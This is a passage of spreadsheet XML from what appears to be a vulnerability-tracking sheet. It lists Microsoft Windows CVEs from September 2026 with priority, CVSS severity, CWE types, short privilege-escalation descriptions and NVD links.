r="B1357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1357" s="5" t="inlineStr"><is><t>CVE-2026-69280</t></is></c><c r="D1357" s="5" t="n"><v>7</v></c><c r="E1357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1357" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1357" s="5" t="inlineStr" /><c r="H1357" s="5" t="n"><v>0.002</v></c><c r="I1357" s="5" t="inlineStr" /><c r="J1357" s="5" t="inlineStr" /><c r="K1357" s="5" t="inlineStr" /><c r="L1357" s="5" t="inlineStr" /><c r="M1357" s="5" t="inlineStr" /><c r="N1357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1357" s="5" t="inlineStr" /><c r="Q1357" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1357" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t></is></c></row><row r="1358"><c r="A1358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1358" s="5" t="inlineStr"><is><t>CVE-2026-69281</t></is></c><c r="D1358" s="5" t="n"><v>7</v></c><c r="E1358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1358" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1358" s="5" t="inlineStr" /><c r="H1358" s="5" t="n"><v>0.003</v></c><c r="I1358" s="5" t="inlineStr" /><c r="J1358" s="5" t="inlineStr" /><c r="K1358" s="5" t="inlineStr" /><c r="L1358" s="5" t="inlineStr" /><c r="M1358" s="5" t="inlineStr" /><c r="N1358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1358" s="5" t="inlineStr" /><c r="Q1358" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1358" s="5" t="inlineStr"><is><t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t></is></c></row><row r="1359"><c r="A1359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1359" s="5" t="inlineStr"><is><t>CVE-2026-69287</t></is></c><c r="D1359" s="5" t="n"><v>7</v></c><c r="E1359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1359" s="5" t="inlineStr" /><c r="H1359" s="5" t="n"><v>0.002</v></c><c r="I1359" s="5" t="inlineStr" /><c r="J1359" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K135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59" s="5" t="inlineStr" /><c r="M1359" s="5" t="inlineStr" /><c r="N1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1359" s="5" t="inlineStr" /><c r="Q1359" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1359" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t></is></c></row><row r="1360"><c r="A1360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1360" s="5" t="inlineStr"><is><t>CVE-2026-69292</t></is></c><c r="D1360" s="5" t="n"><v>7</v></c><c r="E1360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1360" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1360" s="5" t="inlineStr" /><c r="H1360" s="5" t="n"><v>0.002</v></c><c r="I1360" s="5" t="inlineStr" /><c r="J1360" s="5" t="inlineStr" /><c r="K1360" s="5" t="inlineStr" /><c r="L1360" s="5" t="inlineStr" /><c r="M1360" s="5" t="inlineStr" /><c r="N1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1360" s="5" t="inlineStr" /><c r="Q1360" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1360" s="5" t="inlineStr"><is><t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t></is></c></row><row r="1361"><c r="A1361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1361" s="5" t="inlineStr"><is><t>CVE-2026-69299</t></is></c><c r="D1361" s="5" t="n"><v>7</v></c><c r="E1361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1361" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1361" s="5" t="inlineStr" /><c r="H1361" s="5" t="n"><v>0.002</v></c><c r="I1361" s="5" t="inlineStr" /><c r="J1361" s="5" t="inlineStr" /><c r="K1361" s="5" t="inlineStr" /><c r="L1361" s="5" t="inlineStr" /><c r="M1361" s="5" t="inlineStr" /><c r="N1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1361" s="5" t="inlineStr" /><c r="Q1361" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1361" s="5" t="inlineStr"><is><t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t></is></c></row><row r="1362"><c r="A1362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1362" s="5" t="inlineStr"><is><t>CVE-2026-69300</t></is></c><c r="D1362" s="5" t="n"><v>7</v></c><c r="E1362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1362" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1362" s="5" t="inlineStr" /><c r="H1362" s="5" t="n"><v>0.002</v></c><c r="I1362" s="5" t="inlineStr" /><c r="J1362" s="5" t="inlineStr" /><c r="K1362" s="5" t="inlineStr" /><c r="L1362" s="5" t="inlineStr" /><c r="M1362" s="5" t="inlineStr" /><c r="N1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1362" s="5" t="inlineStr" /><c r="Q1362" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1362" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t></is></c></row><row r="1363"><c r="A1363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1363" s="5" t="inlineStr"><is><t>CVE-2026-69309</t></is></c><c r="D1363" s="5" t="n"><v>7</v></c><c r="E1363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1363" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1363" s="5" t="inlineStr" /><c r="H1363" s="5" t="n"><v>0.003</v></c><c r="I1363" s="5" t="inlineStr" /><c r="J1363" s="5" t="inlineStr" /><c r="K1363" s="5" t="inlineStr" /><c r="L1363" s="5" t="inlineStr" /><c r="M1363" s="5" t="inlineStr" /><c r="N1363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1363" s="5" t="inlineStr" /><c r="Q1363" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R1363" s="5" t="inlineStr"><is><t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t></is></c></row><row r="1364"><c r="A1364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1364" s="5" t="inlineStr"><is><t>CVE-2026-69310</t></is></c><c r="D1364" s="5" t="n"><v>7</v></c><c r="E1364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1364" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1364" s="5" t="inlineStr" /><c r="H1364" s="5" t="n"><v>0.003</v></c><c r="I1364" s="5" t="inlineStr" /><c r="J1364" s="5" t="inlineStr" /><c r="K1364" s="5" t="inlineStr" /><c r="L1364" s="5" t="inlineStr" /><c r="M1364" s="5" t="inlineStr" /><c r="N1364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1364" s="5" t="inlineStr" /><c r="Q1364" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1364" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t></is></c></row><row r="1365"><c r="A1365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1365" s="5" t="inlineStr"><is><t>CVE-2026-69311</t></is></c><c r="D1365" s="5" t="n"><v>7</v></c><c r="E1365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1365" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1365" s="5" t="inlineStr" /><c r="H1365" s="5" t="n"><v>0.003</v></c><c r="I1365" s="5" t="inlineStr" /><c r="J1365" s="5" t="inlineStr" /><c r="K1365" s="5" t="inlineStr" /><c r="L1365" s="5" t="inlineStr" /><c r="M1365" s="5" t="inlineStr" /><c r="N1365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1365" s="5" t="inlineStr" /><c r="Q1365" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1365" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t></is></c></row><row r="1366"><c r="A1366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1366" s="5" t="inlineStr"><is><t>CVE-2026-69319</t></is></c><c r="D1366" s="5" t="n"><v>7</v></c><c r="E1366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1366" s="5" t="inlineStr" /><c r="H1366" s="5" t="n"><v>0.002</v></c><c r="I1366" s="5" t="inlineStr" /><c r="J1366" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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66" s="5" t="inlineStr" /><c r="M1366" s="5" t="inlineStr" /><c r="N1366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1366" s="5" t="inlineStr" /><c r="Q1366" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1366" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t></is></c></row><row r="1367"><c r="A1367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1367" s="5" t="inlineStr"><is><t>CVE-2026-69331</t></is></c><c r="D1367" s="5" t="n"><v>7</v></c><c r="E1367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1367" s="5" t="inlineStr" /><c r="H1367" s="5" t="n"><v>0.002</v></c><c r="I1367" s="5" t="inlineStr" /><c r="J1367" s="5" t="inlineStr" /><c r="K1367" s="5" t="inlineStr" /><c r="L1367" s="5" t="inlineStr" /><c r="M1367" s="5" t="inlineStr" /><c r="N1367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1367" s="5" t="inlineStr" /><c r="Q1367" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1367" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t></is></c></row><row r="1368"><c r="A1368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1368" s="5" t="inlineStr"><is><t>CVE-2026-69333</t></is></c><c r="D1368" s="5" t="n"><v>7</v></c><c r="E1368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1368" s="5" t="inlineStr" /><c r="H1368" s="5" t="n"><v>0.003</v></c><c r="I1368" s="5" t="inlineStr" /><c r="J1368" s="5" t="inlineStr" /><c r="K1368" s="5" t="inlineStr" /><c r="L1368" s="5" t="inlineStr" /><c r="M1368" s="5" t="inlineStr" /><c r="N1368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1368" s="5" t="inlineStr" /><c r="Q1368" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1368" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t></is></c></row><row r="1369"><c r="A1369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1369" s="5" t="inlineStr"><is><t>CVE-2026-69335</t></is></c><c r="D1369" s="5" t="n"><v>7</v></c><c r="E1369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1369" s="5" t="inlineStr" /><c r="H1369" s="5" t="n"><v>0.003</v></c><c r="I1369" s="5" t="inlineStr" /><c r="J1369" s="5" t="inlineStr" /><c r="K1369" s="5" t="inlineStr" /><c r="L1369" s="5" t="inlineStr" /><c r="M1369" s="5" t="inlineStr" /><c r="N1369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1369" s="5" t="inlineStr" /><c r="Q1369" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1369" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t></is></c></row><row r="1370"><c r="A1370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1370" s="5" t="inlineStr"><is><t>CVE-2026-69341</t></is></c><c r="D1370" s="5" t="n"><v>7</v></c><c r="E1370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1370" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1370" s="5" t="inlineStr" /><c r="H1370" s="5" t="n"><v>0.003</v></c><c r="I1370" s="5" t="inlineStr" /><c r="J1370" s="5" t="inlineStr" /><c r="K1370" s="5" t="inlineStr" /><c r="L1370" s="5" t="inlineStr" /><c r="M1370" s="5" t="inlineStr" /><c r="N1370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1370" s="5" t="inlineStr" /><c r="Q1370" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1370" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t></is></c></row><row r="1371"><c r="A1371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1371" s="5" t="inlineStr"><is><t>CVE-2026-69362</t></is></c><c r="D1371" s="5" t="n"><v>7</v></c><c r="E1371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1371" s="5" t="inlineStr" /><c r="H1371" s="5" t="n"><v>0.003</v></c><c r="I1371" s="5" t="inlineStr" /><c r="J1371" s="5" t="inlineStr" /><c r="K1371" s="5" t="inlineStr" /><c r="L1371" s="5" t="inlineStr" /><c r="M1371" s="5" t="inlineStr" /><c r="N1371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1371" s="5" t="inlineStr" /><c r="Q1371" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1371" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t></is></c></row><row r="1372"><c r="A1372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1372" s="5" t="inlineStr"><is><t>CVE-2026-69379</t></is></c><c r="D1372" s="5" t="n"><v>7</v></c><c r="E1372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1372" s="5" t="inlineStr" /><c r="H1372" s="5" t="n"><v>0.003</v></c><c r="I1372" s="5" t="inlineStr" /><c r="J1372" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1372" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1372" s="5" t="inlineStr" /><c r="M1372" s="5" t="inlineStr" /><c r="N1372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1372" s="5" t="inlineStr" /><c r="Q1372" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R1372" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t></is></c></row><row r="1373"><c r="A1373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1373" s="5" t="inlineStr"><is><t>CVE-2026-69383</t></is></c><c r="D1373" s="5" t="n"><v>7</v></c><c r="E1373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1373" s="5" t="inlineStr" /><c r="H1373" s="5" t="n"><v>0.002</v></c><c r="I1373" s="5" t="inlineStr" /><c r="J1373" s="5" t="inlineStr" /><c r="K1373" s="5" t="inlineStr" /><c r="L1373" s="5" t="inlineStr" /><c r="M1373" s="5" t="inlineStr" /><c r="N1373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1373" s="5" t="inlineStr" /><c r="Q1373" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1373" s="5" t="inlineStr"><is><t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t></is></c></row><row r="1374"><c r="A1374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1374" s="5" t="inlineStr"><is><t>CVE-2026-69385</t></is></c><c r="D1374" s="5" t="n"><v>7</v></c><c r="E1374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1374" s="5" t="inlineStr" /><c r="H1374" s="5" t="n"><v>0.002</v></c><c r="I1374" s="5" t="inlineStr" /><c r="J1374" s="5" t="inlineStr" /><c r="K1374" s="5" t="inlineStr" /><c r="L1374" s="5" t="inlineStr" /><c r="M1374" s="5" t="inlineStr" /><c r="N1374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1374" s="5" t="inlineStr" /><c r="Q1374" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1374" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t></is></c></row><row r="1375"><c r="A1375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1375" s="5" t="inlineStr"><is><t>CVE-2026-69388</t></is></c><c r="D1375" s="5" t="n"><v>7</v></c><c r="E1375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1375" s="5" t="inlineStr" /><c r="H1375" s="5" t="n"><v>0.003</v></c><c r="I1375" s="5" t="inlineStr" /><c r="J1375" s="5" t="inlineStr" /><c r="K1375" s="5" t="inlineStr" /><c r="L1375" s="5" t="inlineStr" /><c r="M1375" s="5" t="inlineStr" /><c r="N1375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1375" s="5" t="inlineStr" /><c r="Q1375" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1375" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t></is></c></row><row r="1376"><c r="A1376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1376" s="5" t="inlineStr"><is><t>CVE-2026-69394</t></is></c><c r="D1376" s="5" t="n"><v>7</v></c><c r="E1376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1376" s="5" t="inlineStr" /><c r="H1376" s="5" t="n"><v>0.003</v></c><c r="I1376" s="5" t="inlineStr" /><c r="J1376" s="5" t="inlineStr" /><c r="K1376" s="5" t="inlineStr" /><c r="L1376" s="5" t="inlineStr" /><c r="M1376" s="5" t="inlineStr" /><c r="N1376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1376" s="5" t="inlineStr" /><c r="Q1376" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1376" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t></is></c></row><row r="1377"><c r="A1377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1377" s="5" t="inlineStr"><is><t>CVE-2026-69398</t></is></c><c r="D1377" s="5" t="n"><v>7</v></c><c r="E1377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1377" s="5" t="inlineStr" /><c r="H1377" s="5" t="n"><v>0.002</v></c><c r="I1377" s="5" t="inlineStr" /><c r="J1377" s="5" t="inlineStr" /><c r="K1377" s="5" t="inlineStr" /><c r="L1377" s="5" t="inlineStr" /><c r="M1377" s="5" t="inlineStr" /><c r="N1377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1377" s="5" t="inlineStr" /><c r="Q1377" s="5" t="inlineStr"><is><t>CWE-362, CWE-415</t></is></c><c r="R1377" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t></is></c></row><row r="1378"><c r="A1378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1378" s="5" t="inlineStr"><is><t>CVE-2026-69401</t></is></c><c r="D1378" s="5" t="n"><v>7</v></c><c r="E1378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1378" s="5" t="inlineStr" /><c r="H1378" s="5" t="n"><v>0.002</v></c><c r="I1378" s="5" t="inlineStr" /><c r="J1378" s="5" t="inlineStr" /><c r="K1378" s="5" t="inlineStr" /><c r="L1378" s="5" t="inlineStr" /><c r="M1378" s="5" t="inlineStr" /><c r="N1378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1378" s="5" t="inlineStr" /><c r="Q1378" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1378" s="5" t="inlineStr"><is><t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t></is></c></row><row r="1379"><c r="A1379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1379" s="5" t="inlineStr"><is><t>CVE-2026-69404</t></is></c><c r="D1379" s="5" t="n"><v>7</v></c><c r="E1379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1379" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1379" s="5" t="inlineStr" /><c r="H1379" s="5" t="n"><v>0.002</v></c><c r="I1379" s="5" t="inlineStr" /><c r="J1379" s="5" t="inlineStr" /><c r="K1379" s="5" t="inlineStr" /><c r="L1379" s="5" t="inlineStr" /><c r="M1379" s="5" t="inlineStr" /><c r="N1379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1379" s="5" t="inlineStr" /><c r="Q1379" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1379" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t></is></c></row><row r="1380"><c r="A1380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1380" s="5" t="inlineStr"><is><t>CVE-2026-69410</t></is></c><c r="D1380" s="5" t="n"><v>7</v></c><c r="E1380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1380" s="5" t="inlineStr" /><c r="H1380" s="5" t="n"><v>0.003</v></c><c r="I1380" s="5" t="inlineStr" /><c r="J1380" s="5" t="inlineStr" /><c r="K1380" s="5" t="inlineStr" /><c r="L1380" s="5" t="inlineStr" /><c r="M1380" s="5" t="inlineStr" /><c r="N1380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1380" s="5" t="inlineStr" /><c r="Q1380" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1380" s="5" 